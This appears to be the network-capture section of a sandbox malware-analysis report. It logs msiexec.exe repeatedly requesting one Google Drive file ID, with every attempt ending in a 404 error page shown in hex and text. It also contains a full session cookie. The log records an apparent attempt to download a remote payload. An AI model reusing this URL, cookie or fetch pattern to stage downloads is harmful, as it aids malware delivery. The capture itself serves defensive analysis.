                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.449723142.250.185.1934436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:46:52 UTC470OUTGET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:46:53 UTC1541INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIv022PTTz3J0-uwB5i7bBoFDqbBWHxyxDaTOjVD5DelXQ9gqCZTIIhsW6smB8SGSpnj3hd7Mgc
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:52 GMT
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-J5C8yTdoURX0iLq7NFAb9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:46:53 UTC1541INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 4b 53 6c 69 79 6c 72 35 33 42 74 59 61 43 4e 34 70 54 6e 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VKSliylr53BtYaCN4pTnMA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:46:53 UTC111INData Raw: 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ts an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.449724216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:46:55 UTC428OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:46:56 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:55 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-RK-ZfWTEhQfdsx8x1esFfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.449725142.250.185.1934436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:46:58 UTC470OUTGET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:46:59 UTC1534INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyItTnDh5ERL3h_ztKlKSHNqyfJYtgoYRbkq0LKDEV2O5ggjBZ0Hvy1vD1oo8crzpGMq_
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:58 GMT
                                                                        Content-Security-Policy: script-src 'nonce-FxrxZZ4bXMxs2Jsie4atMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:46:59 UTC1534INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 30 64 7a 77 75 71 73 54 61 71 4c 31 54 4d 71 76 7a 72 65 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N0dzwuqsTaqL1TMqvzreAw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:46:59 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.449726216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:01 UTC428OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:02 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:02 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Security-Policy: script-src 'nonce-VJDAK6oj_FEvwo7Qa8JIDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.449727142.250.185.1934436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:04 UTC470OUTGET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:05 UTC1534INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIsaoa32c76A-_xqUbVnoDoVflbdZHIuptV1S_uXAkeBKmBP9n9j5eQnusSpXTfwbdbS
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:05 GMT
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-BizmiIQQApVJFRixZbwTPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:05 UTC1534INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 5f 4a 47 30 36 39 75 63 67 75 68 66 35 75 45 6c 49 45 5f 67 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X_JG069ucguhf5uElIE_gw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:05 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.449728216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:07 UTC428OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:08 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:08 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-0JYIV1XXIPnb3sDGi6nT3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.449729142.250.185.1934436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:10 UTC470OUTGET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:11 UTC1541INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIvaT_FsB5T4MApT0qYxeqLJQeeG9ZHXoS7IB0dICJjTKDKt8rZL9phS1qsscNTSrq4X8AFt2mg
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:11 GMT
                                                                        Content-Security-Policy: script-src 'nonce-FDTODOVFQM1wbLyzoep_zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:11 UTC1541INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 45 33 37 43 67 5a 79 7a 46 68 56 4b 6d 39 47 76 34 6a 65 44 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
